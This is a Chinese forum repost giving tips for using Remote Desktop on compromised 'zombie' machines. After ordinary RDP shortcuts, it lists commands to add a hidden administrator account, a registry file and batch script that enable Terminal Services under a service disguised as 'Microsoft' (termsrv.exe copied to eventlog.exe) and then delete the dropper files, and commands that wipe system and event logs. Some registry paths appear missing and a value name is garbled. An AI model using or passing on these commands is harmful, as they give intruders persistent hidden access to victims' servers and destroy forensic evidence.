PHP小丑 发表于 2021-11-4 21:48:13

不错的一篇3389使用相关技巧

3389肉鸡快捷键
CTRL+ALT+END 把“任务管理器”抓出来
CTRL+ALT+BREAK这个就是切换全屏显示。
CTRL+ALT+END 打开“Windows 安全”对话框。

ALT+PAGE UP 从左向右在程序之间切换。

ALT+PAGE DOWN 从右向左在程序之间切换。

ALT+INSERT 按启动顺序来回切换程序。

ALT+HOME 显示“开始”菜单。

CTRL+ALT+BREAK 在窗口(如果适用)和全屏显示之间切换客户端。

ALT+DELETE 显示窗口的弹出式菜单。

CTRL+ALT+减号 (-) 将客户端活动窗口的快照放在“终端”服务器的剪贴板上(与在本地计算机上按下 ALT+PrintScrn 键时的功能相同)。

CTRL+ALT+加号 (+) 将整个客户端窗口区域的快照放在“终端”服务器的剪贴板上(与在本地计算机上按下 PrintScrn 键时的功能相同)。

注意:

在NEC98 计算机中,这些快捷键在以下两种情况下会有些不同:

CTRL+ALT+BREAK由 F12 键代替。
CTRL+ALT+END 由 F15 键代替。




3389有关用户操作的基本命令

query user查询登陆用户
logoffID蹬出某用户
net user 查看所有用户
net user tty310 1506414 /add 添加一个用户,用户名tty310 密码1506414
net localgroup administrators tty310 /add 把tty310这个用户加到管理员组
net user tty310 查看用户tty310的情况
net user tty310 82073 将用户tty310的密码更改为82073
net user tty310 /delete删除tty310
net user tty310 /active:no禁用该用户
net user tty310 /active:yes 启用该用户
开3389
3389.reg

Windows Registry Editor Version 5.00

"Enabled"="0"

"ShutdownWithoutLogon"="0"

"EnableAdminTSRemote"=dword:00000001

"TSEnabled"=dword:00000001

"Start"=dword:00000002

"Hotkey"="1"

"Start"=dword:00000002
"ErrorControl"=dword:00000001
"ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\
74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65,\
00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00
"ObjectName"="LocalSystem"
"Type"=dword:00000010
"Deion"="Microsoft"
"DisplayName"="Microsoft"


3389.bat

copy termsrv.exe eventlog.exe
regedit.exe /s 3389.reg
del 3389.reg
del 3389.exe
del 3389.bat


重起
iisreset /reboot /timeout:00

reboot


删除日志
del C:\winnt\system32\logfiles\*.*
del C:\winnt\ssytem32\config\*.evt
del C:\winnt\system32\dtclog\*.*
del C:\winnt\system32\*.log
del C:\winnt\system32\*.txt
del C:\winnt\*.txt
del C:\winnt\*.log

https://www.uoften.com/serverhost/winhost/20180415/80183.html
页: [1]
查看完整版本: 不错的一篇3389使用相关技巧